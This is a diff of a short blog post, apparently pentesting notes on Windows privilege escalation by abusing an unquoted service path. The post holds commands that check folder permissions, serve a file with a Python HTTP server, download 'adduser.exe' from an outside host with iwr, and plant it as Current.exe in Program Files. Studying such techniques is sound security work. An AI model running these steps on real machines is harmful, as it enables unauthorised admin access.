ST4RGUARD/ST4RGUARD.github.io/_posts/2023-09-16-win_privesc_path_abuse.md

     PS > Start-Service myservice
     PS > Stop-Service myservice

-now we can uses icalcs to check the permissions of the service binary directories
+now we can uses icalcs to check the permissions of the service binary directories - check each dir

     PS > icacls "C:\Program Files\Enterprise Apps" (...\Current Version\nyservice.exe)

 in this example we have write permissions available to the current user for the Enterprise Apps directory

-so we can copy our malicious executable over - and lable it Current.exe as the next path it is looking for is Curent Version
+so we can copy our malicious executable over - and label it Current.exe as the next path it is looking for is Curent Version

+start our python server

+    $ python3 -m http.server 80

+now import the our binary

     PS > iwr -uri http://192.168.1.1/adduser.exe -Outfile Current.exe
     PS > copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'